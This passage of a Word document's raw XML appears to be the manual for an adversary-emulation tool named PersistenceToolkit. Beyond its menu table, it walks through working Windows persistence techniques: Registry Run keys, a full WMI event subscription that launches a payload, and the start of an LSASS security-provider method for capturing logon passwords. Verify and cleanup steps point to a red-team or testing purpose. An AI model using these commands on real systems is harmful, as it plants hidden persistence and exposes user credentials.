        </w:tc>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212121"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Technique Detail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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View full description, IOCs, and detection for any technique by ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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1565C0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">7</w:t>
            </w:r>
          </w:p>
        </w:tc>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212121"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Session Summary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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Live table of all executed techniques, status, and locations</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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1565C0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">8</w:t>
            </w:r>
          </w:p>
        </w:tc>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212121"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Export Reports</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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Save HTML dashboard, JSON, and CSV to chosen paths</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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1565C0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">9</w:t>
            </w:r>
          </w:p>
        </w:tc>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212121"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Cleanup / Remove</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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Remove all artifacts — interactive or automated</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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1565C0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">s</w:t>
            </w:r>
          </w:p>
        </w:tc>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212121"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Toggle Simulation Mode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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Switch between live and simulation without restarting</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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1565C0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">0</w:t>
            </w:r>
          </w:p>
        </w:tc>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212121"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Exit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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Print final summary and optionally export</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:left w:val="single" w:color="F57F17" w:sz="12" w:space="10"/>
          <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:pBdr>
        <w:shd w:fill="F5F7FA" w:val="clear"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="F57F17"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">NOTE:  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Simulation mode can be toggled at any time with the 's' key from the main menu — no need to restart the session.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1565C0" w:sz="6" w:space="6"/>
        </w:pBdr>
        <w:spacing w:before="520" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D1B2A"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">4.  Technique Walkthroughs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="360" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1565C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows: Registry Run Keys (T1547.001)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">One of the most common persistence techniques. Writes a value to HKCU\Software\Microsoft\Windows\CurrentVersion\Run so the payload executes at every user logon without UAC elevation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Registry Key: HKCU\Software\Microsoft\Windows\CurrentVersion\Run</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Value Name:   PersistenceToolkit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Value Data:   C:\Windows\Temp\payload.exe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Trigger:      Every interactive user logon</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># Verify:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># Clean up:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v PersistenceToolkit /f</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="360" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1565C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows: WMI Event Subscription (T1546.003)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The most powerful Windows persistence mechanism. Creates three WMI objects in ROOT\subscription that together execute a payload when a system event fires. No files needed on disk — lives entirely in the WMI repository. Survives reboots.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1 — EventFilter (when to trigger):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Set-WMIInstance -Class __EventFilter -Arguments @{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  Name="PTFilter"; QueryLanguage="WQL";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">         TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">         AND TargetInstance.SystemUpTime &gt;= 120"}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2 — EventConsumer (what to run):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Set-WMIInstance -Class CommandLineEventConsumer -Arguments @{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  Name="PTConsumer"; ExecutablePath="C:\payload.exe"}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3 — FilterToConsumerBinding (link them):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Set-WMIInstance -Class __FilterToConsumerBinding -Arguments @{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  Filter=(Get-WMIObject __EventFilter -Filter 'Name="PTFilter"');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  Consumer=(Get-WMIObject CommandLineEventConsumer -Filter 'Name="PTConsumer"')}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># Verify:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Get-WMIObject -Namespace root\subscription -Class __EventFilter</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># Clean up:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Get-WMIObject -Namespace root\subscription -Class __EventFilter | Remove-WMIObject</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Get-WMIObject -Namespace root\subscription -Class CommandLineEventConsumer | Remove-WMIObject</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Get-WMIObject -Namespace root\subscription -Class __FilterToConsumerBinding | Remove-WMIObject</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="360" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1565C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows: Security Support Provider / LSASS (T1547.005)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Registers a DLL as an SSP/AP — LSASS loads it at boot and calls its SpLsaModeInitialize function. The DLL receives plaintext credentials (username and password) for every interactive logon. Highly persistent and extremely dangerous.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
